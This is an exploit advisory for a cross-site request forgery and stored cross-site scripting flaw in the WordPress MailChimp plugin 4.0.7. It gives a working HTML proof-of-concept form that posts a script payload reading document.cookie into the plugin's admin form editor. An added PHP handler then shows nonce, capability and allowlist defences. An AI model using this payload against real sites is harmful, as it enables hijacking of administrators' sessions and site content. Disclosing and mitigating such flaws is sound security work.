WordPress MailChimp 4.0.7 Cross Site Request Forgery / Cross Site Scripting
Posted on 21 November 2016
######################
# Exploit Title : WordPress Plugin MailChimp 4.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/plugins/mailchimp-for-wp/
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 4.0.7
# Date: 2016/11/19
######################
#
# PoC:
# I would like to disclose a CSRF and stored XSS vulnerability in the WordPress plugin MailChimp 4.0.7.
# Demo : http://persian-team.ir/showthread.php?tid=192
# The code for CSRF.html is:

<form action="http://localhost/wp/wp-admin/admin.php?page=mailchimp-for-wp-forms&view=edit-form&form_id=60" method="POST">
  Title:<input type="text" name="mc4wp_form[name]" size="30" value="For Testing" id="title" spellcheck="true" autocomplete="off" placeholder="Enter the title of your sign-up form" style="line-height: initial;">
  <input type="submit" style="display: none;" />
  <!-- hidden fields mirror the plugin's own edit-form POST, including its nonce parameter -->
  <input type="hidden" name="_mc4wp_action" value="edit_form" />
  <input type="hidden" name="mc4wp_form_id" value="60" />
  <input type="hidden" id="_mc4wp_nonce" name="_mc4wp_nonce" value="ad1a3e81af" />
  <input type="hidden" name="_wp_http_referer" value="/wp/wp-admin/admin.php?page=mailchimp-for-wp-forms&view=edit-form&form_id=60" />
  <h2>Form Fields</h2>
  <!-- the form "content" field is where the script tag is stored -->
  <textarea class="widefat" cols="160" rows="20" id="mc4wp-form-content" name="mc4wp_form[content]" placeholder="Enter the HTML code for your form fields.." autocomplete="false" autocorrect="false" autocapitalize="false" spellcheck="false"><script>alert(document.cookie)</script><p> </textarea>
  <input type="hidden" id="required-fields" name="mc4wp_form[settings][required_fields]" value="" />
  <input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes" /></p>
</form>

#
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################
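For the defender's side, here is an added example (not the plugin's code and not part of the advisory) of a hypothetical WordPress admin POST handler for the same request shape that closes both issues: a capability check plus nonce verification against the `edit_form` action makes a nonce copied into a third-party page useless to anyone but the user it was issued to (and stale after its lifetime), and `wp_kses()` with a form-only allowlist drops the stored `<script>` before it is saved. The hook name, option key, capability and helper names are assumptions.

```php
<?php
// Added example, not the plugin's code: a hypothetical handler for the POST
// shown in the advisory, hardened against the CSRF and stored-XSS issues it
// describes. Hook name, option key and helper names are assumptions.

add_action( 'admin_post_mc4wp_edit_form_demo', 'demo_handle_edit_form' );

function demo_handle_edit_form() {
    // 1. Capability check: only users who may manage the site edit forms.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }

    // 2. CSRF defence: the nonce in _mc4wp_nonce must have been issued to the
    //    current user for the 'edit_form' action. WordPress nonces are tied to
    //    the user and session and expire, so a value lifted into CSRF.html
    //    does not validate for a different victim; check_admin_referer()
    //    stops the request with a 403 when it fails.
    check_admin_referer( 'edit_form', '_mc4wp_nonce' );

    $form_id = isset( $_POST['mc4wp_form_id'] ) ? absint( $_POST['mc4wp_form_id'] ) : 0;
    $data    = ( isset( $_POST['mc4wp_form'] ) && is_array( $_POST['mc4wp_form'] ) ) ? $_POST['mc4wp_form'] : array();
    $name    = isset( $data['name'] ) ? $data['name'] : '';
    $content = isset( $data['content'] ) ? $data['content'] : '';

    // 3. Stored-XSS defence: the content field legitimately holds HTML for
    //    sign-up fields, so keep only the tags a sign-up form needs. <script>
    //    is not in the allowlist, so the payload is removed before storage.
    $name    = sanitize_text_field( wp_unslash( $name ) );
    $content = wp_kses( wp_unslash( $content ), demo_allowed_form_tags() );

    update_option( 'demo_mc4wp_form_' . $form_id, array( 'name' => $name, 'content' => $content ) );

    wp_safe_redirect( admin_url( 'admin.php?page=mailchimp-for-wp-forms&view=edit-form&form_id=' . $form_id ) );
    exit;
}

// Allowlist for wp_kses(): tag => allowed attributes. Event handlers such as
// onclick are absent, so they are stripped along with <script>.
function demo_allowed_form_tags() {
    return array(
        'p'        => array(),
        'br'       => array(),
        'label'    => array( 'for' => true ),
        'input'    => array( 'type' => true, 'name' => true, 'id' => true, 'value' => true, 'placeholder' => true, 'required' => true ),
        'textarea' => array( 'name' => true, 'id' => true, 'rows' => true, 'cols' => true ),
        'select'   => array( 'name' => true, 'id' => true ),
        'option'   => array( 'value' => true ),
    );
}
```

Rendering the stored `content` later should still go through the same allowlist (or `wp_kses_post()` if richer markup is wanted) rather than echoing the option raw.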